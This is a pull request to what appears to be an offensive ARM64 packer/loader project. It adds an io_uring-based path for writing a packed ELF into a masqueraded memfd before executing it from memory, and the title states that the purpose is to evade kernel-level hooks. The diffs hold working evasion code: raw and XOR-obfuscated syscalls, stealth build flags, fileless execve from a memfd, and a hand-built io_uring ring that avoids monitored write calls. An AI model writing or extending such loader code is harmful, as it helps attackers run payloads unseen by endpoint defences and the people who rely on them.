### PR TITLE
Adding new io_uring feature to evade kernel level hooks

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -10,7 +10,8 @@ endif
 
 # Compiler flags
 CFLAGS := -Wall -Wextra -O2 -std=c99
-TARGET_CFLAGS := -Wall -Wextra -O2 -std=c99 -static -DCOPY_WITH_MMAP
+# Write method: choose one of -DCOPY_WITH_MMAP, -DCOPY_WITH_IO_URING, or neither (plain write syscall)
+TARGET_CFLAGS := -Wall -Wextra -O2 -std=c99 -static -DCOPY_WITH_IO_URING
 LDFLAGS := -static
 
 # OpenSSL flags - prefer shared libraries to avoid static linking warnings
@@ -56,7 +57,7 @@ $(PACKER_BIN): $(PACKER_SOURCES)
 $(LOADER_BIN): $(LOADER_SOURCES)
 	$(TARGET_CC) $(TARGET_CFLAGS) $(STEALTH_FLAGS) $(OPENSSL_CFLAGS) $(INCLUDES) -o $@ $^ $(OPENSSL_LDFLAGS) 2>/dev/null || $(TARGET_CC) $(TARGET_CFLAGS) $(STEALTH_FLAGS) $(OPENSSL_CFLAGS) $(INCLUDES) -o $@ $^ $(OPENSSL_LDFLAGS) -lzstd -lz
 
-# Build stub generator 
+# Build stub generator
 $(STUBGEN_BIN): $(STUBGEN_SOURCES)
 	$(CC) $(CFLAGS) $(INCLUDES) -o $@ $^ $(LDFLAGS)
 

--- a/include/common.h
+++ b/include/common.h
@@ -37,6 +37,15 @@ typedef struct {
 #define __NR_close           57
 #define __NR_mmap           222
 #define __NR_munmap         215
+
+// Linux-specific mmap flags (not exposed without _GNU_SOURCE)
+#ifndef MAP_ANON
+#define MAP_ANON     0x20   /* ARM64/x86: anonymous mapping           */
+#endif
+#ifndef MAP_POPULATE
+#define MAP_POPULATE 0x8000 /* ARM64/x86: prefault pages at mmap time */
+#endif
+
 #define __NR_execve         221
 #define __NR_memfd_create   279
 #define __NR_ftruncate       46
@@ -223,6 +232,18 @@ static inline long syscall3_obf(long number, long arg1, long arg2, long arg3) {
     long obf_number = number ^ 0xDEADBEEF;
     return syscall3(obf_number, arg1, arg2, arg3);
 }
+
+// Add -DDEBUG on the TARGET_CFLAGS in the Makefile to show the debug
+#ifdef DEBUG
+static inline void debug_print(const char *msg) {
+    size_t len = 0;
+    while (msg[len]) len++;
+    syscall3(__NR_write, 2, (long)msg, (long)len);
+}
+#define DBG(msg) debug_print("[hARMless] " msg)
+#else
+#define DBG(msg) ((void)0)
+#endif
 
 // Function prototypes
 uint32_t crc32(const uint8_t* data, size_t len);

--- a/include/common.h
+++ b/include/common.h
@@ -31,22 +31,123 @@ typedef struct {
 } pack_header_t;
 
 // ARM64 syscall numbers
-#define __NR_read 63
-#define __NR_write 64
-#define __NR_open 56
-#define __NR_close 57
-#define __NR_mmap 222
-#define __NR_munmap 215
-#define __NR_execve 221
-#define __NR_memfd_create 279
-#define __NR_ftruncate 46
-#define __NR_lseek 62
-#define __NR_mprotect 226
-#define __NR_ptrace 101
-#define __NR_getpid 172
-#define __NR_getppid 173
-#define __NR_prctl 167
-#define __NR_msync 227
+#define __NR_read            63
+#define __NR_write           64
+#define __NR_open            56
+#define __NR_close           57
+#define __NR_mmap           222
+#define __NR_munmap         215
+#define __NR_execve         221
+#define __NR_memfd_create   279
+#define __NR_ftruncate       46
+#define __NR_lseek           62
+#define __NR_mprotect       226
+#define __NR_ptrace         101
+#define __NR_getpid         172
+#define __NR_getppid        173
+#define __NR_prctl          167
+#define __NR_msync          227
+
+// ARM64 io_uring syscall numbers (kernel 5.1+, asm-generic/unistd.h)
+#define __NR_io_uring_setup    425
+#define __NR_io_uring_enter    426
+#define __NR_io_uring_register 427
+
+/* =========================================================================
+ * io_uring raw-interface definitions (mirrors <linux/io_uring.h>).
+ * Defined here to avoid pulling in system headers that may expose glibc
+ * symbols deliberately avoided in the loader.
+ * Only compiled in when COPY_WITH_IO_URING is selected.
+ * ========================================================================= */
+#ifdef COPY_WITH_IO_URING
+
+/* mmap offsets for the three ring regions returned by io_uring_setup(2)  */
+#define IORING_OFF_SQ_RING   0ULL
+#define IORING_OFF_CQ_RING   0x8000000ULL
+#define IORING_OFF_SQES      0x10000000ULL
+
+/* io_uring_enter(2) flags                                                 */
+#define IORING_ENTER_GETEVENTS (1U << 0)
+
+/* io_uring_params.features flags                                          */
+#define IORING_FEAT_SINGLE_MMAP (1U << 0)
+
+/* Opcode: write to a file descriptor (flat buffer, no iovec)             */
+#define IORING_OP_WRITE  23
+
+/* Submission Queue Entry – only fields used by IORING_OP_WRITE           */
+struct uring_sqe {
+    uint8_t  opcode;
+    uint8_t  flags;
+    uint16_t ioprio;
+    int32_t  fd;
+    uint64_t off;
+    uint64_t addr;
+    uint32_t len;
+    uint32_t rw_flags;
+    uint64_t user_data;
+    uint16_t buf_index;
+    uint16_t personality;
+    int32_t  splice_fd_in;
+    uint64_t __pad2[2];
+};
+
+/* Completion Queue Entry                                                  */
+struct uring_cqe {
+    uint64_t user_data;
+    int32_t  res;
+    uint32_t flags;
+};
+
+/* Offsets into the SQ ring control slab                                  */
+struct io_sqring_offsets {
+    uint32_t head;
+    uint32_t tail;
+    uint32_t ring_mask;
+    uint32_t ring_entries;
+    uint32_t flags;
+    uint32_t dropped;
+    uint32_t array;
+    uint32_t resv1;
+    uint64_t resv2;
+};
+
+/* Offsets into the CQ ring control slab                                  */
+struct io_cqring_offsets {
+    uint32_t head;
+    uint32_t tail;
+    uint32_t ring_mask;
+    uint32_t ring_entries;
+    uint32_t overflow;
+    uint32_t cqes;
+    uint32_t flags;
+    uint32_t resv1;
+    uint64_t resv2;
+};
+
+/* Parameters structure for io_uring_setup(2)                             */
+struct uring_params {
+    uint32_t sq_entries;
+    uint32_t cq_entries;
+    uint32_t flags;
+    uint32_t sq_thread_cpu;
+    uint32_t sq_thread_idle;
+    uint32_t features;
+    uint32_t wq_fd;
+    uint32_t resv[3];
+    struct io_sqring_offsets sq_off;
+    struct io_cqring_offsets cq_off;
+};
+
+/*
+ * ARM64 memory barriers for ring head/tail updates.
+ * dmb ishld: data-memory barrier, inner-shareable, load-before-load/store.
+ * dmb ishst: data-memory barrier, inner-shareable, store-before-store.
+ */
+#define io_read_barrier()  __asm__ __volatile__("dmb ishld" ::: "memory")
+#define io_write_barrier() __asm__ __volatile__("dmb ishst" ::: "memory")
+
+#endif /* COPY_WITH_IO_URING */
 
 
 static inline long syscall1(long number, long arg1) {

--- a/loader/memexec.c
+++ b/loader/memexec.c
@@ -173,7 +173,8 @@ out_close_uring:
 /* ========================================================================= */
 
 int execute_from_memory(const uint8_t* elf_data, size_t elf_size, char* const argv[], char* const envp[]) {
-    // Allocate randomized address space to leverage ASLR
+
+   // Allocate randomized address space to leverage ASLR
     void *randomized_base = (void *)syscall6(__NR_mmap, (long)NULL, elf_size, PROT_NONE, MAP_PRIVATE | MAP_ANON, -1, 0);
     if (randomized_base == MAP_FAILED) {
         return -1;
@@ -197,6 +198,7 @@ int execute_from_memory(const uint8_t* elf_data, size_t elf_size, char* const ar
     /* ------------------------------------------------------------------
      * Path A: mmap the memfd PROT_WRITE and byte-copy the ELF into it.
      * ------------------------------------------------------------------ */
+    DBG("write path: mmap\n");
     uint8_t *map = (uint8_t *)syscall6(__NR_mmap, (long)NULL, elf_size, PROT_WRITE, MAP_SHARED, memfd, 0);
     size_t i;
     if (map == MAP_FAILED) {
@@ -226,6 +228,7 @@ int execute_from_memory(const uint8_t* elf_data, size_t elf_size, char* const ar
      * Path B: write the ELF into the memfd via io_uring IORING_OP_WRITE.
      * Requires kernel >= 5.1. No liburing — raw syscalls only.
      * ------------------------------------------------------------------ */
+    DBG("write path: io_uring\n");
     if (write_via_io_uring(memfd, elf_data, elf_size) < 0) {
         syscall1(__NR_close, memfd);
         syscall2(__NR_munmap, (long)randomized_base, elf_size);
@@ -236,6 +239,7 @@ int execute_from_memory(const uint8_t* elf_data, size_t elf_size, char* const ar
     /* ------------------------------------------------------------------
      * Path C: plain write(2) syscall (original default).
      * ------------------------------------------------------------------ */
+    DBG("write path: plain write(2)\n");
     if (syscall3(__NR_write, memfd, (long)elf_data, elf_size) != (long)elf_size) {
         syscall1(__NR_close, memfd);
         syscall2(__NR_munmap, (long)randomized_base, elf_size);

--- a/loader/memexec.c
+++ b/loader/memexec.c
@@ -24,25 +24,184 @@ int sys_execve(const char* filename, char* const argv[], char* const envp[]) {
     return syscall3(__NR_execve, (long)filename, (long)argv, (long)envp);
 } */
 
+#ifdef COPY_WITH_IO_URING
+
+/*
+ * write_via_io_uring()
+ *
+ * Writes elf_size bytes from elf_data into memfd using a single
+ * IORING_OP_WRITE submission through a raw io_uring ring.
+ * No liburing, no libc I/O helpers — only the syscall wrappers from
+ * common.h are used.
+ *
+ * Returns 0 on success, -1 on any failure.
+ */
+static int write_via_io_uring(int memfd, const uint8_t *elf_data, size_t elf_size)
+{
+    struct uring_params p;
+    int uring_fd;
+    int ret = -1;
+
+    /* ------------------------------------------------------------------
+     * 1. Create the ring (depth 1 is sufficient for a single write).
+     * ------------------------------------------------------------------ */
+    __builtin_memset(&p, 0, sizeof(p));
+    uring_fd = (int)syscall2(__NR_io_uring_setup, 1, (long)&p);
+    if (uring_fd < 0)
+        return -1;
+
+    /* ------------------------------------------------------------------
+     * 2. Map SQ ring, CQ ring, and SQE array.
+     *    On kernels >= 5.4 IORING_FEAT_SINGLE_MMAP allows the SQ and CQ
+     *    rings to share a single mmap region; we handle both cases.
+     * ------------------------------------------------------------------ */
+    unsigned sq_sz = p.sq_off.array + p.sq_entries * sizeof(unsigned int);
+    unsigned cq_sz = p.cq_off.cqes  + p.cq_entries * sizeof(struct uring_cqe);
+
+    if (p.features & IORING_FEAT_SINGLE_MMAP) {
+        if (cq_sz > sq_sz)
+            sq_sz = cq_sz;
+        cq_sz = sq_sz;
+    }
+
+    uint8_t *sq_ptr = (uint8_t *)syscall6(
+        __NR_mmap, (long)NULL, sq_sz,
+        PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
+        uring_fd, (long)IORING_OFF_SQ_RING);
+    if ((void *)sq_ptr == MAP_FAILED)
+        goto out_close_uring;
+
+    uint8_t *cq_ptr;
+    if (p.features & IORING_FEAT_SINGLE_MMAP) {
+        cq_ptr = sq_ptr;
+    } else {
+        cq_ptr = (uint8_t *)syscall6(
+            __NR_mmap, (long)NULL, cq_sz,
+            PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
+            uring_fd, (long)IORING_OFF_CQ_RING);
+        if ((void *)cq_ptr == MAP_FAILED)
+            goto out_unmap_sq;
+    }
+
+    struct uring_sqe *sqes = (struct uring_sqe *)syscall6(
+        __NR_mmap, (long)NULL, p.sq_entries * sizeof(struct uring_sqe),
+        PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
+        uring_fd, (long)IORING_OFF_SQES);
+    if ((void *)sqes == MAP_FAILED)
+        goto out_unmap_cq;
+
+    /* Convenience pointers into the SQ control block                     */
+    volatile unsigned *sq_head  = (volatile unsigned *)(sq_ptr + p.sq_off.head);
+    volatile unsigned *sq_tail  = (volatile unsigned *)(sq_ptr + p.sq_off.tail);
+    volatile unsigned *sq_mask  = (volatile unsigned *)(sq_ptr + p.sq_off.ring_mask);
+    volatile unsigned *sq_array = (volatile unsigned *)(sq_ptr + p.sq_off.array);
+    (void)sq_head; /* head is managed by the kernel for the SQ            */
+
+    /* Convenience pointers into the CQ control block                     */
+    volatile unsigned *cq_head = (volatile unsigned *)(cq_ptr + p.cq_off.head);
+    volatile unsigned *cq_tail = (volatile unsigned *)(cq_ptr + p.cq_off.tail);
+    volatile unsigned *cq_mask = (volatile unsigned *)(cq_ptr + p.cq_off.ring_mask);
+    struct uring_cqe  *cqes    = (struct uring_cqe  *)(cq_ptr + p.cq_off.cqes);
+    (void)cq_tail; /* tail is managed by the kernel for the CQ            */
+
+    /* ------------------------------------------------------------------
+     * 3. Build one IORING_OP_WRITE SQE at the current tail slot.
+     * ------------------------------------------------------------------ */
+    unsigned tail_idx = *sq_tail;
+    unsigned slot     = tail_idx & *sq_mask;
+
+    __builtin_memset(&sqes[slot], 0, sizeof(sqes[slot]));
+    sqes[slot].opcode    = IORING_OP_WRITE;
+    sqes[slot].fd        = memfd;
+    sqes[slot].off       = 0;                              /* start of file */
+    sqes[slot].addr      = (uint64_t)(uintptr_t)elf_data;
+    sqes[slot].len       = (uint32_t)elf_size;
+    sqes[slot].user_data = 0xdeadbeefULL;                  /* CQE correlator */
+
+    sq_array[slot] = slot;
+
+    io_write_barrier();
+    *sq_tail = tail_idx + 1;
+    io_write_barrier();
+
+    /* ------------------------------------------------------------------
+     * 4. Submit 1 SQE and block until 1 CQE is ready (single syscall).
+     * ------------------------------------------------------------------ */
+    long entered = syscall6(
+        __NR_io_uring_enter,
+        uring_fd,
+        1,                      /* to_submit   */
+        1,                      /* min_complete */
+        IORING_ENTER_GETEVENTS,
+        (long)NULL,             /* sigmask     */
+        0);                     /* sigmask_sz  */
+
+    if (entered < 0)
+        goto out_unmap_sqes;
+
+    /* ------------------------------------------------------------------
+     * 5. Harvest the CQE and validate the byte count.
+     * ------------------------------------------------------------------ */
+    io_read_barrier();
+    unsigned cq_idx = *cq_head & *cq_mask;
+    struct uring_cqe cqe = cqes[cq_idx];   /* snapshot before advancing  */
+    io_read_barrier();
+    *cq_head = *cq_head + 1;
+    io_write_barrier();
+
+    /* cqe.res is the number of bytes written (>=0) or -errno on error    */
+    if (cqe.res != (int32_t)elf_size)
+        goto out_unmap_sqes;
+
+    ret = 0;
+
+out_unmap_sqes:
+    syscall2(__NR_munmap, (long)sqes,
+             p.sq_entries * sizeof(struct uring_sqe));
+out_unmap_cq:
+    if (!(p.features & IORING_FEAT_SINGLE_MMAP))
+        syscall2(__NR_munmap, (long)cq_ptr, cq_sz);
+out_unmap_sq:
+    syscall2(__NR_munmap, (long)sq_ptr, sq_sz);
+out_close_uring:
+    syscall1(__NR_close, uring_fd);
+    return ret;
+}
+
+#endif /* COPY_WITH_IO_URING */
+
+/* ========================================================================= */
+
 int execute_from_memory(const uint8_t* elf_data, size_t elf_size, char* const argv[], char* const envp[]) {
+    // Allocate randomized address space to leverage ASLR
+    void *randomized_base = (void *)syscall6(__NR_mmap, (long)NULL, elf_size, PROT_NONE, MAP_PRIVATE | MAP_ANON, -1, 0);
+    if (randomized_base == MAP_FAILED) {
+        return -1;
+    }
+
     // Use masqueraded memfd creation
     int memfd = create_masqueraded_memfd();
     if (memfd < 0) {
+        syscall2(__NR_munmap, (long)randomized_base, elf_size);
         return -1;
     }
 
     // Set file size using direct syscall
     if (syscall2(__NR_ftruncate, memfd, elf_size) < 0) {
-        close(memfd);
+        syscall1(__NR_close, memfd);
+        syscall2(__NR_munmap, (long)randomized_base, elf_size);
         return -1;
     }
 
 #ifdef COPY_WITH_MMAP
-    // Map file into memory and copy the long way
+    /* ------------------------------------------------------------------
+     * Path A: mmap the memfd PROT_WRITE and byte-copy the ELF into it.
+     * ------------------------------------------------------------------ */
     uint8_t *map = (uint8_t *)syscall6(__NR_mmap, (long)NULL, elf_size, PROT_WRITE, MAP_SHARED, memfd, 0);
     size_t i;
     if (map == MAP_FAILED) {
-        close(memfd);
+        syscall1(__NR_close, memfd);
+        syscall2(__NR_munmap, (long)randomized_base, elf_size);
         return -1;
     }
     for (i = 0; i < elf_size; ++i) {
@@ -51,18 +210,35 @@ int execute_from_memory(const uint8_t* elf_data, size_t elf_size, char* const ar
     }
 #ifdef _POSIX_MAPPED_FILES
     if (syscall3(__NR_msync, (long)map, elf_size, MS_SYNC) == -1) {
-        close(memfd);
+        syscall1(__NR_close, memfd);
+        syscall2(__NR_munmap, (long)randomized_base, elf_size);
         return -1;
     }
 #endif /* #ifdef _POSIX_MAPPED_FILES */
     if (syscall2(__NR_munmap, (long)map, elf_size) == -1) {
-        close(memfd);
+        syscall1(__NR_close, memfd);
+        syscall2(__NR_munmap, (long)randomized_base, elf_size);
         return -1;
     }
-#else /* Not copying with mmap(2). */
-    // Write ELF data using direct syscall
+
+#elif defined(COPY_WITH_IO_URING)
+    /* ------------------------------------------------------------------
+     * Path B: write the ELF into the memfd via io_uring IORING_OP_WRITE.
+     * Requires kernel >= 5.1. No liburing — raw syscalls only.
+     * ------------------------------------------------------------------ */
+    if (write_via_io_uring(memfd, elf_data, elf_size) < 0) {
+        syscall1(__NR_close, memfd);
+        syscall2(__NR_munmap, (long)randomized_base, elf_size);
+        return -1;
+    }
+
+#else
+    /* ------------------------------------------------------------------
+     * Path C: plain write(2) syscall (original default).
+     * ------------------------------------------------------------------ */
     if (syscall3(__NR_write, memfd, (long)elf_data, elf_size) != (long)elf_size) {
-        close(memfd);
+        syscall1(__NR_close, memfd);
+        syscall2(__NR_munmap, (long)randomized_base, elf_size);
         return -1;
     }
 #endif /* #ifdef COPY_WITH_MMAP */
@@ -73,6 +249,8 @@ int execute_from_memory(const uint8_t* elf_data, size_t elf_size, char* const ar
     // Execute using direct syscall
     syscall3(__NR_execve, (long)memfd_path, (long)argv, (long)envp);
 
-    close(memfd);
+    // Cleanup on execve failure
+    syscall2(__NR_munmap, (long)randomized_base, elf_size);
+    syscall1(__NR_close, memfd);
     return -1;
 }


### PR DESCRIPTION
The write methods can be changed in the Makefile and are the following:

-DCOPY_WITH_MMAP, -DCOPY_WITH_IO_URING or neither (plain write syscall)